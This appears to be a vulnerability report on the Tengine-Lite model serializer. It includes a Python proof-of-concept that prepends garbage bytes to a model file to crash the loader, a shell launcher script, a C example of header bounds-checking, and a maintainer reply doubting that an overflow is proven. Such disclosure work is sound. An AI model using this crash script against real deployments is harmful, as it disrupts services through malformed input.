Vulnerability analysis

We found that in the serializer module there is a buffer overflow problem.

Link: https://github.com/OAID/Tengine/blob/tengine-lite/src/serializer/tm/tm2_serializer.c

The problem is in the load_model function starting at line 798, which calls the get_tm_file_model function at line 840.
The first parameter mem_base of the get_tm_file_model function points to the address space where the model file is located, and the second parameter is controlled by mem_base. For this project, the model is an input controlled by the user, so the parameters of get_tm_file_model can be controlled.
PoC
Download the official example model, and select the landmark model to demonstrate here.
According to the official use case, the landmark model is run normally, and the program executes normally.
Write 9 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. The program reports a routine error.
Write 10 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. The program crashes.
EXP:
```python
import os

# Work on a copy so the original model file stays intact.
os.system('cp landmark.tmfile test.tmfile')

with open("./test.tmfile", "rb+") as f:
    old = f.read()
    n = 0xA  # 10 bytes: 9 gives a routine error, 10 crashes the loader
    print('Writes %d bytes of data to the file header' % n)
    text = b'A' * n
    f.seek(0)
    # Prepend the garbage bytes, shifting the real header by n bytes.
    f.write(text)
    f.write(old)

os.system('./attack.sh')
```

attack.sh:

```sh
dir='/mnt/hgfs/starcross/CVE/Tengine-Lite'
export LD_LIBRARY_PATH=$dir/build/install/lib
$dir/build/install/bin/tm_landmark -m $dir/model/landmark/test.tmfile -i $dir/model/landmark/photo.jpg -r 1 -t 1
```
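The bug class the report describes, a header field read from a user-controlled model file and turned into a pointer without being checked against the mapped size, is closed by validating every header-derived offset before it is dereferenced. The C below is an added example, not Tengine's code: the header layout, magic value and function names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed header layout for illustration only (not the real TM2 format):
 * 4-byte magic "TM2\0", then a 4-byte little-endian offset of the model body. */
#define HDR_MAGIC 0x00324D54u
#define HDR_SIZE  8u

/* mem_base + offset only if [offset, offset + len) lies inside the mapped file; the subtraction cannot wrap like offset + len. */
static const uint8_t *bounded_ptr(const uint8_t *mem_base, size_t mem_size,
                                  size_t offset, size_t len)
{
    if (mem_base == NULL || offset > mem_size || len > mem_size - offset)
        return NULL;
    return mem_base + offset;
}

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Check every header-derived value before it becomes a pointer.
 * 0 = ok, -1 = file shorter than header, -2 = bad magic, -3 = body offset outside file. */
int check_model(const uint8_t *mem_base, size_t mem_size, size_t *body_off)
{
    const uint8_t *hdr = bounded_ptr(mem_base, mem_size, 0, HDR_SIZE);
    if (hdr == NULL) return -1;
    if (rd_le32(hdr) != HDR_MAGIC) return -2;
    uint32_t off = rd_le32(hdr + 4);
    if (bounded_ptr(mem_base, mem_size, off, 1) == NULL) return -3;
    *body_off = off;
    return 0;
}

/* Constructed 12-byte model: header, then a 4-byte body at offset 8. */
static const uint8_t good_model[12] = { 'T','M','2',0, 8,0,0,0, 1,2,3,4 };

/* The PoC's mutation: prepend `garbage` (0..20) bytes of 'A', shifting the header. */
int demo_prepended(size_t garbage)
{
    uint8_t buf[32]; size_t off;
    memset(buf, 'A', garbage);
    memcpy(buf + garbage, good_model, sizeof good_model);
    return check_model(buf, garbage + sizeof good_model, &off);
}

/* Intact magic, but the body offset (0xFFFF) points far past a 12-byte file. */
int demo_bad_offset(void)
{
    uint8_t buf[12]; size_t off;
    memcpy(buf, good_model, sizeof buf);
    buf[4] = 0xFF; buf[5] = 0xFF;
    return check_model(buf, sizeof buf, &off);
}
```

With the PoC's 9- and 10-byte prepends the shifted header is rejected at the magic check instead of being parsed, and an in-range magic with an out-of-range offset is rejected before the offset is used.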
Thanks for reporting the potential issue.
A model header with wrong content will cause a program crash, and that is what you observed. I don't think there is any proof of overflow so far.